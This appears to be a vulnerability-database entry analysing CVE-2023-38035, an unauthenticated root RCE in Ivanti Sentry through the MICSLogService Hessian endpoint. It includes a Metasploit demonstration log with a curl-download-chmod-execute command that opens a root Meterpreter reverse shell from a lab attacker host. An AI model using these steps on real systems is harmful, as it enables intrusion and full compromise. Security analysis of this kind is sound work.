Very High
CVE-2023-38035
CVE-2023-38035
Description
A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.
Add Assessment
Technical Analysis
Description
Ivanti Sentry (formerly MobileIron Sentry) is vulnerable to an authentication by-pass which exposes API functionality which allows for code execution in the context of the root user. The vulnerable endpoint /mics/services/MICSLogService exposes a binary web service protocol, Hessian, which allows remote users to invoke functions within the target Sentry system.
One of the functions accessible via Hessian and the vulnerable endpoint is uploadFileUsingFileInput which accepts a command argument that gets directly fed into a Runtime.getRuntime().exec(cmd) call. The command is run in the context of the tomcat2 user however by default tomcat2 is able to execute commands with sudo thus we can use this to execute the payload in the context of the root user.
Attacker Value and Exploitability
For attacker’s this one is pretty juicy as it gives unauthenticated RCE in the context of the root users, it doesn’t get much better than that. Seeing CVE-2023-38035 being added to the KEV list only one day after it was published speaks volumes on the usefulness to malicious adversaries. To the attacker’s benefit there aren’t any definitive IoCs other than unrecognized HTTP requests to /services/* which should be cause for concern. The only saving grace is that a Shodan search for Ivanti Sentry targets on the internet only yielded around 500 vulnerable instances exposed at the time the vuln was disclosed.
Vulnerable Versions
Ivanti Sentry versions vulnerable to CVE-2023-38035:
- =< 9.18.0
Vulnerable Environment
A vulnerable MobileIron Sentry version 9.12.0-16 .vhd file can be downloaded from the following URL
Metasploit Module Demonstration
msf6 > use linux/http/ivanti_sentry_misc_log_service [*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set rhosts 192.168.1.78 rhosts => 192.168.1.78 msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set lhost 192.168.1.72 lhost => 192.168.1.72 msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set fetch_srvhost 192.168.1.72 fetch_srvhost => 192.168.1.72 msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set verbose true verbose => true msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > exploit [*] Reloading module... [*] Command to run on remote host: curl -so /tmp/ccrjHXsc http://192.168.1.72:8080/etRbFA76UzDRclkL8zrTdg; chmod +x /tmp/ccrjHXsc; /tmp/ccrjHXsc & [*] Fetch Handler listening on 192.168.1.72:8080 [*] HTTP server started [*] Adding resource /etRbFA76UzDRclkL8zrTdg [*] Started reverse TCP handler on 192.168.1.72:4443 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. [*] Executing Unix (In-Memory) for cmd/linux/http/x64/meterpreter_reverse_tcp [*] Running the command: sudo curl -so /tmp/ccrjHXsc http://192.168.1.72:8080/etRbFA76UzDRclkL8zrTdg [*] Client 192.168.1.78 requested /etRbFA76UzDRclkL8zrTdg [*] Sending payload to 192.168.1.78 (curl/7.29.0) [*] Running the command: sudo chmod +x /tmp/ccrjHXsc [*] Running the command: sudo /tmp/ccrjHXsc & [*] Meterpreter session 6 opened (192.168.1.72:4443 -> 192.168.1.78:40550) at 2023-08-29 14:27:57 -0400 meterpreter > getuid Server username: root meterpreter > sysinfo Computer : localhost.localdomain OS : CentOS 7.8.2003 (Linux 3.10.0-1160.el7.x86_64) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter > exit
CVSS V3 Severity and Metrics
General Information
Vendors
- ivanti
Products
- mobileiron sentry
Metasploit Modules
References
Exploit
Additional sources will be added here as they become relevant.
Notes: We will only add the top 3 POCs for a given CVE. POCs added here must have at least 2 GitHub stars.
